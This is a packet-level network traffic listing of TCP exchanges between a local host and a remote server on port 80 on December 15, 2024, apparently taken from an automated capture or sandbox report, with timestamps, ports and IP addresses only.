                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.093816042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.093897104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.093919992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.094644070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.094913006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.095041990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.095212936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.096179008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.096235037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.096507072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.097246885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.097356081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.097568989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.098434925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.098531008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.098654032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.099585056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.099736929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.100265026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.100732088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.100764990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.101913929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.102118015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.102132082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.102231026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.103082895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.103152990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.103738070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.104314089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.104458094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.105389118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.105443954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.105468988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.105559111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.106637001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.106760025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.106867075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.107757092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.107805967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.107908964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.108839035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.108958006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.109532118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.110042095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.110158920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.110419989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.111185074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.111346960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.112344980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.112493992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.112517118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.112914085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.113522053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.113646030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.113806009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.114717007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.114777088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.115829945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.115952969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.115982056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.116065979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.116996050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.117095947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.117192984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.118140936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.118242979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.118560076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.119364977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.119523048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.119798899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.120492935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.120615959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.120728970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.121674061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.121761084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.121992111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.122795105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.122988939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.123106956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.123972893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.124074936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.124213934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.125152111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.125250101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.125487089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.126326084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.126393080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.127244949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.127516031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.127633095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.127798080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.128624916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.128730059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.128818989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.129781961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.129868031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.130233049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.130922079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.131026030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.131299019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.132478952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.132570028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.133260965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.133299112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.133338928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.134387016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.134418011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.176903009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.265579939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.265615940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.265702009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.265847921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.265947104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.266016006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.267038107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.267148972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.267215967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.268225908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.268292904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.268371105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.269310951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.269382954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.269448996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.270493984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.270612955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.270684958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271641970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271711111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271785021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.272818089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.272928953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.273144007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.273955107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.274056911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.274139881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275136948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275240898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275371075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276303053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276422024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276494026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277431011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277553082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277626991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278609037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278740883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278809071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279771090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279870987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279952049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.280942917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.281163931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.281233072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282092094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282215118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282279015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283262968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283365965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283461094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284435034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284533978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284601927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285588980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285768986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285836935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.286758900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.286849976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.287084103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288024902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288155079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288220882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289068937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289169073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289529085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290246964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290374041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290441036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291380882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291541100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291620016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292643070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292726040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292802095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293745995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293793917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293864012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.294863939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.295006037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.295077085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296020031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296128035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296197891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297190905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297287941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297353983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298356056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298475981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298602104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299511909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299606085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299681902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300685883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300848007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300915003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.301840067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.301924944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.302006006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.302992105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.303097963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.303210020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304157972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304300070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304367065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305315971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305421114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305491924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306451082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306572914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306643963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307646036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307817936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307904005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.308778048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.308944941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.309017897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.309966087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.310077906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.310148954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.311095953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.311238050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.311307907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.312269926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.312408924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.312484980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.313469887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.313533068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.313621044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.314570904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.314687967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.314765930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.315737963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.315867901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.315943956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.316890001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.317012072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.317081928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.318068981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.318171024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.318243027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.319271088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.319387913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.319463968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.320415974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.320519924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.320589066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.321568012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.321685076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.321757078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.322717905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.322833061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.322901011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.323873997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.323992968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.324063063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.325086117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.325218916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.325294971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.326206923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.379993916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.457844973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.457869053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.457963943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.458291054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.458367109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.458596945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.459443092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.459717989 CET8049708185.81.68.147192.168.2.5
